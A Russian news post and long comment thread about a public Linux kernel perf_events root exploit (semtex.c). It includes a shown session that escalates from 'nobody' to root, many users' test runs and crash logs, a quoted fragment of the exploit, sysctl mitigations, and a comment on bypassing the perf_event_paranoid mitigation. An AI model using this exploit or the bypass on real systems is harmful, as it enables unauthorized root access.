В ядре Linux обнаружена (http://packetstormsecurity.com/files/121616/semtex.c) уязвимость, позволяющая получить root-доступ произвольному пользователю. Проблему усложняет то, что ошибка существовала на протяжении последних 2-3 лет и существует во всех ядрах начиная с 2.6.37 и включая 3.8.10.
Проблема присутствует в коде PERF_EVENTS, которая должна быть активирована для успешной эксплуатации уязвимости. Пользователи RHEL 6 и CentOS, несмотря на использование ядра 2.6.32, не застрахованы от данной ошибки - проблемный код был успешно бэкпортирван Red Hat в пакет с ядром, поставляемом в RHEL.
Эксплоит уже доступен (http://packetstormsecurity.com/files/121616/semtex.c) публично:
<font color="#461b7e">
bash-4.1# gcc -O2 exploit.c
bash-4.1# chmod 777 a.out
bash-4.1# su nobody -s /bin/bash
bash-4.1$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody)bash-4.1$ cd /
bash-4.1$ ls
a.out bin boot dev etc exploit.c home lib lib64 media....
bash-4.1$ ./a.out
2.6.37-3.x x86_64sh-4.1# id
uid=0(root) gid=0(root) groups=0(root),99(nobody)</font>
URL: http://packetstormsecurity.com/files/121616/semtex.c
Новость: http://www.opennet.me/opennews/art.shtml?num=36933
Считаем сколько дней пойдет на исправление этой уязвимости. Т.к. начинается с 2.6.37 и заканчивается 3.8.10 - то ставлю 2 недели максимум. Кто как думает?
Да уже исправлено, в 3.9 не работает
> Считаем сколько дней пойдет на исправление этой уязвимости.0day :] в данном разе -- "исправлено в 3.8.10" (или даже 3.8.9).
pavel@localhost:/tmp> gcc semtex.c
pavel@localhost:/tmp> ./a.outMessage from syslogd@localhost at May 14 21:26:26 ...
kernel:Oops: 0000 [#1] PREEMPT SMPMessage from syslogd@localhost at May 14 21:26:26 ...
kernel:Stack:Message from syslogd@localhost at May 14 21:26:26 ...
kernel:Call Trace:Message from syslogd@localhost at May 14 21:26:26 ...
kernel:Code: 00 00 00 48 8b 47 18 65 48 8b 14 25 c0 96 00 00 48 83 e0 fe 48 39 c2 75 08 c7 47 28 01 00 00 00 c3 0f 0b 53 48 89 fb 48 83 ec 10 <8b> 17 83 fa 01 74 2d 8d 4a ff 89 d0 f0 0f b1 0f 39 c2 89 c1 75Message from syslogd@localhost at May 14 21:26:26 ...
kernel:CR2: 0000001781642448
Убито
pavel@localhost:/tmp># dmesg
BUG: unable to handle kernel paging request at 0000001781642448
IP: [<ffffffff81070ad8>] 0xffffffff81070ad8
PGD 263121067 PUD 0
Oops: 0000 [#1] PREEMPT SMP
CPU 0
Modules linked in: ipt_ECN ipt_REJECT iptable_filter xt_recent iptable_mangle xt_DSCP nvidia(O) sg ohci_hcdPid: 3256, comm: a.out Tainted: G O 3.2.44-rt64 #1 TYAN Computer Corp. S2895/S2895
RIP: 0010:[<ffffffff81070ad8>] [<ffffffff81070ad8>] 0xffffffff81070ad8
RSP: 0018:ffff880204281e68 EFLAGS: 00010282
RAX: 00000007fffffff8 RBX: 0000001781642448 RCX: 0000000000000000
RDX: ffff88023965b100 RSI: ffffffff81549b00 RDI: 0000001781642448
RBP: 00000000ffffffff R08: ffff880204280000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000000 R12: ffff8802396a33d0
R13: ffff88020a525700 R14: ffff880266c5b780 R15: ffff8802108f7810
FS: 00007fb697b4b700(0000) GS:ffff88027fc00000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
CR2: 0000001781642448 CR3: 0000000204002000 CR4: 00000000000006f0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400
Process a.out (pid: 3256, threadinfo ffff880204280000, task ffff88023965b100)
Stack:
ffffffff8157ba08 ffffffff81093d27 0000001781642448 ffffffff81094140
ffff880265040400 ffffffff8108cc78 ffff88020a525700 ffff880265040400
ffff8802396a33cc ffffffff8108d967 ffff880265040400 ffffffff8108da96
Call Trace:
[<ffffffff81093d27>] ? 0xffffffff81093d27
[<ffffffff81094140>] ? 0xffffffff81094140
[<ffffffff8108cc78>] ? 0xffffffff8108cc78
[<ffffffff8108d967>] ? 0xffffffff8108d967
[<ffffffff8108da96>] ? 0xffffffff8108da96
[<ffffffff8108dbd0>] ? 0xffffffff8108dbd0
[<ffffffff810db890>] ? 0xffffffff810db890
[<ffffffff810d7e8f>] ? 0xffffffff810d7e8f
[<ffffffff810d7f6e>] ? 0xffffffff810d7f6e
[<ffffffff81438dfb>] ? 0xffffffff81438dfb
Code: 00 00 00 48 8b 47 18 65 48 8b 14 25 c0 96 00 00 48 83 e0 fe 48 39 c2 75 08 c7 47 28 01 00 00 00 c3 0f 0b 53 48 89 fb 48 83 ec 10 <8b> 17 83 fa 01 74 2d 8d 4a ff 89 d0 f0 0f b1 0f 39 c2 89 c1 75
RIP [<ffffffff81070ad8>] 0xffffffff81070ad8
RSP <ffff880204281e68>
CR2: 0000001781642448
---[ end trace 0000000000000002 ]---
Где рут?
А рут растет в "огородном компе" писателя... )))
> А рут растет в "огородном компе" писателя... )))уточнения: писателя экплоида
локальный dos тоже не плохо :-)
syscall(298 ... - это как я понимаю __NR_perf_event_open
void sheep(uint32_t off) {uint64_t buf[10] = { 0x4800000001, off, 0, 0, 0, 0x300 };
int fd = syscall(298, buf, 0, -1, -1, 0);
...Тут хрень какая-то получается, второй элемент массива buf должно быть число указывающие
размер всей этой структуры (в реальности buf должен быть типа struct perf_event_attr),
что-то вродеbuf[2] = sizeof(buff[0])/sizeof(buf); ну иль тупа 10 написать.
ну да хрен с ними... тут передаётся офсет.. Более того, 8-ой элемент, это битовое поле disabled,
которое включено по дефолту...Чёй-то мне в лом дальше копать, но похоже автор особо не парился над универсальностью
иль это такая защита от скрипт-кидисов. :)
Кстати, пиплы, защититься от этого не просто, а очень просто!sysctl -w kernel.perf_event_paranoid = 2
sysctl -w kernel.perf_event_max_sample_rate= -1Тогда ядро отстрелит этот експлоет с EACCES (Permission denied)
Спасибо за инфу!
> Кстати, пиплы, защититься от этого не просто, а очень просто!
> sysctl -w kernel.perf_event_paranoid = 2Угу, это и в шляпной баге приводят: https://bugzilla.redhat.com/show_bug.cgi?id=962792#c7
> sysctl -w kernel.perf_event_max_sample_rate= -1
Спасибо за дополнение.
Благодарю.
Тут вот пишут, что "kernel.perf_event_paranoid=2" не достаточно — "https://bugzilla.redhat.com/show_bug.cgi?id=962792", хоть и защищает от предложенной реализации exploit-а. Исходя из этого появляется вопрос, откуда появилась идея сделать "kernel.perf_event_max_sample_rate=-1" и поможет ли это?
идея, вероятно, отсюда:
if (attr.freq) {
if (attr.sample_freq > sysctl_perf_event_sample_rate) // kernel.perf_event_max_sample_rate
return -EINVAL;
}но attr.freq в запросе этого эксплоита не выставлен, поэтому особого смысла нет.
А kernel.perf_event_paranoid=2 и впрямь недостаточно, т.к. основывается на этом коде:
if (!attr.exclude_kernel) {
if (perf_paranoid_kernel() && !capable(CAP_SYS_ADMIN))
return -EACCES;
}
достаточно включить attr.exclude_kernel в исходном запросе, чтобы kernel.perf_event_paranoid=2 перестало спасать.
> достаточно включить attr.exclude_kernel в исходном запросе, чтобы kernel.perf_event_paranoid=2 перестало спасать.Ну вот спалил эксплойт... А детишки тут так радовались, что не работает :)
Благодарю.> if (attr.freq)
Я правильно понимаю, что я сейчас не могу достаточным образом защитить сервера без накладывания патчей? :(
> Благодарю.
>> if (attr.freq)
> Я правильно понимаю, что я сейчас не могу достаточным образом защитить сервера
> без накладывания патчей? :(Уже апдейты вышли.
Эта "защита" обходится правкой в эскпойте.
> Тут хрень какая-то получается, второй элемент массива buf должно быть число указывающие
> размер всей этой структуры (в реальности buf должен быть типа struct perf_event_attr),нене, все правильно, в структуре первые два поля __u32, а тут все элементы uint64_t. Размер, соответственно, 0x48.
>> Тут хрень какая-то получается, второй элемент массива buf должно быть число указывающие
>> размер всей этой структуры (в реальности buf должен быть типа struct perf_event_attr),
> нене, все правильно, в структуре первые два поля __u32, а тут все
> элементы uint64_t. Размер, соответственно, 0x48.Ну да, это и есть сама дыра.
компилить с опцией -O2 ( Буква О )
> Считаем сколько дней пойдет на исправление этой уязвимости. Т.к. начинается с 2.6.37
> и заканчивается 3.8.10 - то ставлю 2 недели максимум. Кто как
> думает?src # uname -a
Linux main 3.2.0-37-generic #58-Ubuntu SMP Thu Jan 24 15:28:10 UTC 2013 x86_64 x86_64 x86_64 GNU/LinuxТоже не работает.
> Тоже не работает.Да угомонись уже! Уроки делай!
$ ./a.out
a.out: exp.c:51: sheep: Assertion `!close(fd)' failed.
Аварийный остановКак обычно. Не один эксплойт за последние 2 года не работает на генте :(
неудачник
На ядре 3.8.2-pf еще как работает.
Gentoo hardened
Эксплойт не работает. не на 3.7 не на 3.8 =)На не hardened я получаю упс ;) но он по сути не роялит
на 3.3.8 кальковсом не hardened ядре (гентушное ядро плюс патч для aufs) также все гут
$ ./a.out
a.out: exploit.c:51: sheep: Assertion `!close(fd)' failed.
Аварийный останов3.7 не hardened.
#define grammar_nazi_mode
нИ на 3.7 нИ на 3.8 =)
#define uber_grammar_nazi_mode
нИ на 3.7, нИ на 3.8 =)
Та же фигня.
art@artbook:~/exploit$ uname -a
Linux artbook 3.2.0-42-generic-pae #67-Ubuntu SMP Mon May 6 21:55:09 UTC 2013 i686 athlon i386 GNU/Linux
$ ./a.out
a.out: exploit.c:51: sheep: Assertion `!close(fd)' failed.
Аварийный остановАналогично. Slackware i486 14.0
попробуйте запустить его из под root-а ;-)
>Не один эксплойтНи один эксплойт
>>Не один эксплойт
> Ни один эксплойтНи один эксплоит
> Ни один эксплойт#undef Grammar Nazi
> $ ./a.out
> a.out: exp.c:51: sheep: Assertion `!close(fd)' failed.
> Аварийный остановто же самое на арче.
А 3.9 что-же неуязвимо?
>Автор новости: linux must _RIP_От оно как!
Сегодняшняя новость с соседних полей: "Microsoft анонсировали выпуск серии обновлений, нацеленных на устранение уязвимостей в своих продуктах. Заявленные ранее в пре-релизе (9 мая) секьюрити-фиксы покрывают 33 уникальных уязвимости (2 исправления со статусом Critical и 8 со статусом Important)." ©"Must RIP" все таки кое-кто другой...
stealth@route66:~$ gcc -Os semtex.c
stealth@route66:~$ chmod 777 a.out
stealth@route66:~$ ./a.out
Killed
stealth@route66:~$
stealth@route66:~$ gcc -O2 semtex.c
stealth@route66:~$ chmod 777 a.out
stealth@route66:~$ ./a.out
Killed
stealth@route66:~$ uname -a
Linux route66 3.0.66-route66 #2 SMP PREEMPT Thu Feb 28 20:33:22 GMT-4 2013 x86_64 GNU/Linux
stealth@route66:~$ zgrep -i PERF_EVENTS /proc/config.gz
CONFIG_HAVE_PERF_EVENTS=y
CONFIG_PERF_EVENTS=y
CONFIG_HAVE_PERF_EVENTS_NMI=y
Сурово - самому себе доверять со второго раза )))
> Сурово - самому себе доверять со второго раза )))Доверять нельзя никому, кроме себя. И даже себе - с осторожностью.
Если открыть главную ссылку к новости, то там сказано:This has been fixed in 3.8.10
очередная версия su без пароля для лентяев обновляющих ядро редко-редко..
К слову сказать в RHEL/Centos ядро все равно обновляется по yum update.
А компилить что-то самому в данных дистрибутивах (да и в любых пакетных) будет идеологически неправильно, за исключением случаев когда речь идет о добавлении нового функционала.
Хотя...тут следует уточнить :
Компилить самому в том же RHEL/Centos идеологически правильно в том случае если исходники "родные" src.rpms да и сборка производится с помощью rpmbuild. А вот тянуть ванильное в энтерпрайз - не комильфо.А ситуация с данной дырой вызвала внеочередное желание потюнить ядро и выключить всякие PERF_EVENTS без которых наверняка можно жить.
> Хотя...тут следует уточнить :Угу.
> Компилить самому в том же RHEL/Centos идеологически правильно в том случае если
> исходники "родные" src.rpms да и сборка производится с помощью rpmbuild.Не совсем, т.к. сборочная среда тоже существенна, а BuildRequires: в шляпах полнотой не так давно не отличались.
вы не подскажете - почему CentOS постоянно ругается на то что создать сборочное окружение шапки сложно?
может по тому что шапке не хочется отдавать такой кусок хлеба сообществу?
не умеешь сделать бинарники - плати тем кто умеет.
> вы не подскажете - почему CentOS постоянно ругается на то что создать
> сборочное окружение шапки сложно?
> может по тому что шапке не хочется отдавать такой кусок хлеба сообществу?Но вы-то конечно не такой. Отдадите сообществу всё, что имеете, даже то, что по лицензии отдавать не надо. Как? Нету ничего? Ой...
да я и не пытаюсь прикидываться другом сообщества.
Хотя многие вещи раздавались под public domain или под BSDL.а шапка зажимает все что от нее не требуют и что можно зажать, при этом прикидываясь другом сообщества.
> да я и не пытаюсь прикидываться другом сообщества.По вам заметно.
> Хотя многие вещи раздавались под public domain или под BSDL.
Вы бы еще озвучили - какие именно? А то апломба у вас - как будто вы свой собственный кернел написали. В два раза лучше линукса.
> а шапка зажимает все что от нее не требуют и что можно зажать,
> при этом прикидываясь другом сообщества.Они всего лишь еще одна корпорация. А то что она взаимодействует с сообществом - так это нормально. У них и сообщества вполне есть точки соприкосновения, где результат нужен и тем и другим. А ничего сверх этого никто никому и не должен, собственно. Просто редхат так может, а оркал - нет. Вот вас и давит жабой. Редхат то в отличие от оракла совсем грубых промашек в взаимодействии с сообществом не допускает. И не ходит потом сливать токсичные отходы в апачевский могильник. Не требуется как-то.
> Вы бы еще озвучили - какие именно? А то апломба у вас - как будто вы свой собственный кернел написали. В два раза лучше линукса.Зачем? те кто хотели уже догадались - а остальным это не нужно.
> Они всего лишь еще одна корпорация. А то что она взаимодействует с сообществом - так это нормально.
Как вы защищаете redhat, вот собственно теже слова можно сказать о любой корпорации - будь-то oracle, будь то IBM. При этом у redhat очень много пиара, а oracle просто делает свое дело и не пиарится.
Вы говорите о ошибках в взаимодейтвии с сообществом..Хм.. а помните что случилось после redhat linux 9? Как редхат в один момент сказал - баста, больше бинарных пакетов вы не увидете. Помните как в redhat el6 редхат сказал - баста, больше состава патчей на ядро не покажу - кому надо платите деньги.
Это как? Это не ошибки? Вот сейчас приходится платить шапке 400 баксов в год -только за то что бы иногда смотреть на состав патчей. Проверая что же она наложила . И можно сказать спасило проекту ksplice - который дал возможность это делать свободно.
Это типа нормальное поведение и взаимодействие с сообществом? Вместо помощи - постоянные анальные огораживания когда им это удобно.
> Зачем? те кто хотели уже догадались - а остальным это не нужно.Ишь какой скромный сразу стал. Офигеть.
> Как вы защищаете redhat,
Я не "защищаю редхат". Я всего лишь капитаню. Ну и слегка положительно отношусь к тем кто делает работу, результат которой мне оказывается полезен. Только и всего.
> вот собственно теже слова можно сказать о любой корпорации - будь-то oracle,
В принципе все так и есть. Просто оракл например очень уж старательно угробил свою репутацию у посторонних своим деревянным менеджментом из лохматых проприерастических девяностых прошлого века. Поэтому о них я это говорить как-нибудь подожду. Ну то-есть, некую пользу линевому ядру приносит даже оракл. Но глядя как они брутально факапнулись с кучей открытых проектов и менеджментом оных, я предпочту не рассчитывать на таких как оракл.
> будь то IBM.
А IBM живет там где-то в своей норе с своими power. Мне он перпендикулярен. Ну и пусть себе живет. Для меня он на 99.9% бесполезен (не вижу исходящих оттуда коммитов полезных мне). Поэтому я не буду его пиарить. Пусть сами пиарятся. В целом у них с их power'ами вышла довольно закрытая и нишевая экосистема. Ну и ССЗБ, собственно.
> При этом у redhat очень много пиара, а oracle просто делает свое дело и не пиарится.
Редхат в отличие от оракла не факапает открытые проекты настолько глупо и грубо как оракл. А оракл продолбал минимум два крупных проекта: мускул и либру.
> Вы говорите о ошибках в взаимодейтвии с сообществом..
Вы только представьте себе: это портит репутацию фирмы и подрывает доверие к ее деятельности. Надо же, какая неожиданность. У остальных как-то вот хватает ума так не подставляться. А оракл зато блеснул дубовостью своего менеджмента во всей красе. Ну вот и получается что такую фирму можно только врагам своим советовать. Чтоб мучались с таким невменяемым менеджменетом потом.
> Хм.. а помните что случилось после redhat linux 9? Как редхат в
> один момент сказал - баста, больше бинарных пакетов вы не увидете.
> Помните как в redhat el6 редхат сказал - баста, больше состава
> патчей на ядро не покажу - кому надо платите деньги.Редхат конечно тоже делал непопулярные решения. Но за их ломовой вклад в развитие системы (коммиты их специалистов нужные лично мне я вижу регулярно) - им многое простят. Тем более что GPL они не нарушают, а ничего сверх того они как-то никому и не обязаны, если уж с формальной точки зрения смотреть. У оракля соотношение пользы от них к collateral damage совершенно несравнимое.
Кстати, если вы хотите меня упрекнуть в двойных стандартах, курите болт! Я на Дреппера и политику глибсы ругался очень даже, btw. И редхат таки выкусил последствия оной. И таки заткнулись насчет ARM и пилят. В общем хорошо если ошибки признают. Хоть и слоупочно.
> Это как? Это не ошибки? Вот сейчас приходится платить шапке 400 баксов
> в год -только за то что бы иногда смотреть на состав патчей.Вообще, 400 баксов в год - вполне подъемная сумма даже для сравнительно небольшой фирмы, если уж ей надо. А уж RIPOFF'щики редхат -> Unbreakable из оракла и подавно потянут. Хотя я понимаю, унизительно платить конкуренту за просмотр патчей :)
> Проверая что же она наложила . И можно сказать спасило
> проекту ksplice - который дал возможность это делать свободно.Там такая свобода, конечно, завязанная на целый один оракл, что я как-нибудь пешком постою и как-нибудь не буду от таких вендоров зависеть, спасибо. Оракл как-то своим менеджментом не порадовал в последнее время.
> Это типа нормальное поведение и взаимодействие с сообществом? Вместо помощи -
> постоянные анaльные огораживания когда им это удобно.Как бы это сказать? Вопрос в соотношении вреда и пользы. У оракла с этим все плохо. Они на данный момент как-то замечены в основном в допиловке btrfs. Относительно мелкой, хоть и нужной (багфиксинг в основном). Ничего так по крупному они нигде не меняют, не решают и прочая. А вот парней из редхата я вижу в очень многих ключевых подсистемах которые мне в ядре требуются. Стоит ли говорить что за это я сделаю редхату некоторый дискаунт?
> Редхат конечно тоже делал непопулярные решения. Но за их ломовой вклад в развитие системы (коммиты их специалистов нужные лично мне я вижу регулярно) - им многое простят. Тем более что GPL они не нарушают, а ничего сверх того они как-то никому и не обязаны, если уж с формальной точки зрения смотреть. У оракля соотношение пользы от них к collateral damage совершенно несравнимое.А покажите где Oracle нарушал GPL? Пилят OpenJDK, пилят MySQL, пилят BerkleyDB и еще стопку разных проектов. Только о непопулярных решениях и попытках выжать деньги из пользователей сделаных redhat - вы предпочитаете забыть, а непопулярные решения oracle (как вас коснулось временное приостановка открытия mysql tests suite?) вы предпочитаете раздувать до уровня слона.
> Там такая свобода, конечно, завязанная на целый один оракл, что я как-нибудь пешком постою и как-нибудь не буду от таких вендоров зависеть, спасибо. Оракл как-то своим менеджментом не порадовал в последнее время.
Да стойте - кто вам мешает. Но это пример достаточно большого вклада. Надо ли напоминать что возможность склонировать git и вести разработку поверх гита - это очень приятно, в отличии наживательства на всем чем можно со стороны redhat ?
Ну да - у вас есть свобода - завязаная на целый RedHat который в последнее время очень агресивно душит все проекты которые пытаются зарабатывать копеечку на поддержке линукса (мы же все помним чем аукнулось CentOS закрытие патчей ядра).
> Вообще, 400 баксов в год - вполне подъемная сумма даже для сравнительно небольшой фирмы, если уж ей надо. А уж RIPOFF'щики редхат -> Unbreakable из оракла и подавно потянут. Хотя я понимаю, унизительно платить конкуренту за просмотр патчей :)Вообще я с Oracle не связан - ну совсем никак. Но необходимость смотреть в их патчи есть. И необходимость ходить к начальству обосновывать зачем это надо - слегка напрягает.
> Как бы это сказать? Вопрос в соотношении вреда и пользы. У оракла с этим все плохо.У редхата той области что мне надо - очень плохо. Поэтому за постоянные создавания проблемы лично мне - имею большой зуб на них. Надо ли говорить что всех их действия вызывают разочарование?
Тем более слишком явно они создают экосистему удобную только им и вытесняют другие решения.
> Надо ли напоминать что возможность склонировать git и вести разработку поверх
> гита - это очень приятно, в отличии наживательства на всем чем
> можно со стороны redhat ?Не хамите. Надо ли напоминать, "благодаря" какому ораклу эта возможность для широкой публики стала недоступной?
Чем это я хамлю? хамил ваш дружок который поливал тут матом, а его даже не пытались забанить. и он до сих пор это делает.и да, напомните - как это оракл мог другой компании что-то навязать?
И стоит напомнить что эта возможность сейчас просто монетизирована и отжимает толику бабла для redhat.
> Ну да - у вас есть свобода - завязаная на целый RedHat
> который в последнее время очень агресивно душит все проекты которые пытаются
> зарабатывать копеечку на поддержке линукса (мы же все помним чем аукнулось
> CentOS закрытие патчей ядра).а) CentOS не пытается зарабатывать копеечку
б) Ничем не аукнулось - жив-здоров
в) Передергивание
> вы не подскажетеТолько в обмен на аналогичную информацию по ораклу.
> вы не подскажете - почему CentOS постоянно ругается на то что создать
> сборочное окружение шапки сложно?Наверное потому что шапка делает так как удобно ей, а не какому-то там центосу, ораклу, Васе Пупкину и прочим линуксрипам. И что характерно, все остальные делают то же самое.
>> вы не подскажете - почему CentOS постоянно ругается на то что создать
>> сборочное окружение шапки сложно?
> Наверное потому что шапка делает так как удобно ей, а не какому-то
> там центосу, ораклу, Васе Пупкину и прочим линуксрипам. И что характерно,
> все остальные делают то же самое.только остальных за это поливают грязью - а redhat весь такой белый и пушистый.
Не подскажете почему такое лицемерие?
Шапка отдаёт ВСЁ, что положено отдавать. А buildsys - это их know how, и отдавать оное они не особо обязаны.
> Шапка отдаёт ВСЁ, что положено отдавать. А buildsys - это их know
> how, и отдавать оное они не особо обязаны.О как мы заговорили.. А покажите мне где Oracle отдает не все что положено отдавать?
MySQL test suite? Java test suite? а ничего что это внутренние проекты и тоже это их know how.. а значит не должно быть видимо.
> О как мы заговорили.. А покажите мне где Oracle отдает не все
> что положено отдавать?
> MySQL test suite? Java test suite? а ничего что это внутренние проекты
> и тоже это их know how.. а значит не должно быть
> видимо.А ничего, что эти сьюты когда-то нормально коммюнити отдавались? До ораклы.
>> О как мы заговорили.. А покажите мне где Oracle отдает не все
>> что положено отдавать?
>> MySQL test suite? Java test suite? а ничего что это внутренние проекты
>> и тоже это их know how.. а значит не должно быть
>> видимо.
> А ничего, что эти сьюты когда-то нормально коммюнити отдавались? До ораклы.а ничего что бинарные rpm отдавались нормально комьюнити? ничего что редхат стал продавать доступ к патчам которые были доступны просто так? причем это не отдельные продукты как сьюта - а вполне себе части открытого продукта? и мало того что их просто закрыли - так еще и занимаются обфускацией кода.
> а ничего что бинарные rpm отдавались нормально комьюнити? ничего что редхат стал
> продавать доступ к патчам которые были доступны просто так?а) GPL не обязывает отдавать бинари
б) GPL обязывает отдавать сырки только вместе с бинарями
в) GPL не обязывает отдавать изменения в "удобоваримом" для каждого встречного виде - обязывает только отдавать
>> а ничего что бинарные rpm отдавались нормально комьюнити? ничего что редхат стал
>> продавать доступ к патчам которые были доступны просто так?
> а) GPL не обязывает отдавать бинари
> б) GPL обязывает отдавать сырки только вместе с бинарями
> в) GPL не обязывает отдавать изменения в "удобоваримом" для каждого встречного виде
> - обязывает только отдаватьг) окакал прошел туда куда и следовало
> только остальных за это поливают грязью - а redhat весь такой белый и пушистый.Минутку, я на Дреппера и политику глибсы уже несколько лет как наезжал. В конечном итоге кстати ситуация улучшилась. Хоть и поздновато как-то, после парочки форков.
> Не подскажете почему такое лицемерие?
Не вижу лицемерия. Хотя может быть, вы о себе? Тогда вам виднее.
>> только остальных за это поливают грязью - а redhat весь такой белый и пушистый.
> Минутку, я на Дреппера и политику глибсы уже несколько лет как наезжал.
> В конечном итоге кстати ситуация улучшилась. Хоть и поздновато как-то, после
> парочки форков.Если бы только glibc. А то что выжимают деньги из воздуха? Занимаются обфускацией патчей - а вы все поете диферамбы им. Хотя тот же Alt мог бы брать исправления безопасности оттуда - а теперь вы этого лишены.
>>> только остальных за это поливают грязью - а redhat весь такой белый и пушистый.
>> Минутку, я на Дреппера и политику глибсы уже несколько лет как наезжал.
>> В конечном итоге кстати ситуация улучшилась. Хоть и поздновато как-то, после
>> парочки форков.
> Если бы только glibc. А то что выжимают деньги из воздуха? Занимаются
> обфускацией патчей - а вы все поете диферамбы им. Хотя тот
> же Alt мог бы брать исправления безопасности оттуда - а теперь
> вы этого лишены.какая-же у вас попаболь неприкрытая по этому поводу.
окакал получил то, чего заслуживал.
Кстати как выключить PERF_EVENTS через make menuconfig ятак и ненашел.
Правда-правда? А как на счет этого? Ядро свежак, если чо...xxx@dev1 /tmp $ gcc -O2 semtex.c
semtex.c: В функции «main»:
semtex.c:78:11: предупреждение: ignoring return value of «setresuid», declared with attribute warn_unused_result [-Wunused-result]
semtex.c:78:29: предупреждение: ignoring return value of «setresgid», declared with attribute warn_unused_result [-Wunused-result]
xxx@dev1 /tmp $ chmod 777 a.out
xxx@dev1 /tmp $ sudo -u nobody -s /bin/bash
nobody@dev1 /tmp $ id
uid=65534(nobody) gid=65534(nobody) группы=65534(nobody)
nobody@dev1 /tmp $ ./a.out
2.6.37-3.x x86_64
sd@fucksheep.org 2010
dev1 tmp #
dev1 tmp # exit
logout
nobody@dev1 /tmp $ uname -a
Linux dev1.xxxx.biz 3.8.2-pf #2 SMP Fri Apr 26 09:36:31 VLAT 2013 x86_64 Intel(R) Core(TM) i3-2377M CPU @ 1.50GHz GenuineIntel GNU/LinuxУ меня стоит гента
Данная ситуация отягощена тем, что дыру еще не закрыли. Однако из этого не следует что процедура своевременного обновления ПО бесполезна в принципе.
у меня стоит гента:$ ./a.out
a.out: semtex.c:51: sheep: Assertion `!close(fd)' failed.
Аварийный останов
$ uname -a
Linux valkyrie 3.7.10-gentoo #1 SMP PREEMPT Fri Apr 19 17:55:03 EEST 2013 i686 Intel(R) Core(TM)2 Duo CPU T5670 @ 1.80GHz GenuineIntel GNU/Linux
$ zgrep -i PERF_EVENTS /proc/config.gz
CONFIG_HAVE_PERF_EVENTS=y
CONFIG_PERF_EVENTS=y
CONFIG_HAVE_PERF_EVENTS_NMI=y
$
В сорцах сказано, что надо x86_64. На i686 не работает.
Linux ... 3.5.0-28-generic #48-Ubuntu SMP Tue Apr 23 23:03:38 UTC 2013 x86_64 x86_64 x86_64 GNU/LinuxUbuntu аварийный останов. На Генте ядро свежее. Тролинг дня "а как собрать ядро, что бы запускался експлойт?"
"--enable-exploit" добавьте.
> "--enable-exploit" добавьте.НЕ помогло и он психанул и набрал "rm -rf /"
не пашет на редхате 6bash-4.1$ /tmp/a.out
2.6.37-3.x x86_64
sd@fucksheep.org 2010
a.out: ./semtex.c:81: main: Assertion `p = memmem(code, 1024, &needle, 8)' failed.
Aborted (core dumped)
bash-4.1$ id
uid=99(nobody) gid=99(nobody) groups=99(nobody) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
bash-4.1$ geten
getenforce getent
bash-4.1$ getenforce
Permissive
bash-4.1$ uname -a
Linux ip-10-56-58-157 2.6.32-358.el6.x86_64 #1 SMP Tue Jan 29 11:47:41 EST 2013 x86_64 x86_64 x86_64 GNU/Linux
bash-4.1$ uptime
10:52:12 up 6 days, 3:52, 1 user, load average: 0.04, 0.11, 0.07
bash-4.1$
Может кто подсказать? У Минта, вроде бы, свой Update Manager, в котором по умолчанию не ставятся новые версии ядер из-за того, что "может повлиять на стабильность", хотя в оригинальных Ubuntu они без спроса пользователя устанавливаются в систему. Это означает, что можно без опасений обновлять ядро?
Ubuntu 13.04 x64
Linux kernel 3.8.0-19-genericgcc -O2 $HOME/Downloads/exploit.c
/home/blablabla/Downloads/exploit.c: In function ‘main’:
/home/blablabla/Downloads/exploit.c:78:11: warning: ignoring return value of ‘setresuid’, declared with attribute warn_unused_result [-Wunused-result]
/home/blablabla/Downloads/exploit.c:78:29: warning: ignoring return value of ‘setresgid’, declared with attribute warn_unused_result [-Wunused-result]Кто запустил отпишитесь ?
Я создал a.out хотя и с выше описанными ошибками. Добрался до
su nobody -s /bin/bash
А он сцуко пароль какой-то хочет и без него никуда, как быть, хелп ! Тоесть я не смогу получить права рута не введя пароль, который мне не известен...
Потому как если просто запустить его то
./a.out
Killed=(
"Я создал a.out" - зпично звучит... ))
Кто-то вообще исходники читал? :))))
наххолеру там исключения вообще?
Суся 12.3 Linux 3.7.10-1.1-desktop #1 SMP PREEMPT Thu Feb 28 15:06:29 UTC 2013 (82d3f21) x86_64 x86_64 x86_64 GNU/Linux
Рута не получил, но Oops вызвал.
Linux inspiron 3.2.0-42-generic #67-Ubuntu SMP Mon May 6 21:33:33 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux таже фигня.
Это какая "та же"? У меня с таким же ядром было "Убито", и все.
> Это какая "та же"? У меня с таким же ядром было "Убито",
> и все.http://ru.wikipedia.org/wiki/Linux_oops и всё. Скриншота там не сделаешь. Повторять не хочется, ибо снова ребутиться придется.
> Это какая "та же"? У меня с таким же ядром было "Убито",
> и все.May 15 00:10:05 inspiron kernel: [57114.570563] BUG: unable to handle kernel paging request at 0000001781ef8788
May 15 00:10:05 inspiron kernel: [57114.570604] IP: [<ffffffff8108f225>] atomic_dec_and_mutex_lock+0x15/0x90
May 15 00:10:05 inspiron kernel: [57114.570638] PGD 1f2e11067 PUD 0
May 15 00:10:05 inspiron kernel: [57114.570656] Oops: 0000 [#1] SMP
May 15 00:10:05 inspiron kernel: [57114.570674] CPU 0
May 15 00:10:05 inspiron kernel: [57114.570683] Modules linked in: usblp snd_hda_codec_hdmi snd_hda_codec_cirrus snd_hda_intel snd_hda_codec snd_hwdep snd_pcm parport_pc
snd_seq_midi ppdev snd_rawmidi bnep rfcomm uvcvideo videodev ums_realtek usbhid hid v4l2_compat_ioctl32 snd_seq_midi_event snd_seq snd_timer snd_seq_device arc4 joydev at
h3k snd ath9kMay
rain87@rain87-laptop:/tmp$ ./a.out
Убито
rain87@rain87-laptop:/tmp$ uname -a
Linux rain87-laptop 3.4.4-030404-generic #201206221555 SMP Fri Jun 22 19:56:36 UTC 2012 x86_64 x86_64 x86_64 GNU/Linuxчёт не взлетело. хотя на миг вылетело в консоль с дампом, не успел рассмотреть
./a.out
a.out: semtex.c:51: sheep: Assertion `!close(fd)' failed.
AbortedLinux netbook 3.7.5-030705-generic #201301280206 SMP Mon Jan 28 07:17:09 UTC 2013 i686 GNU/Linux
Debian 7.0, ядро ubuntu
> Linux netbook 3.7.5-030705-generic #201301280206 SMP Mon Jan 28 07:17:09 UTC 2013 i686
> GNU/Linux
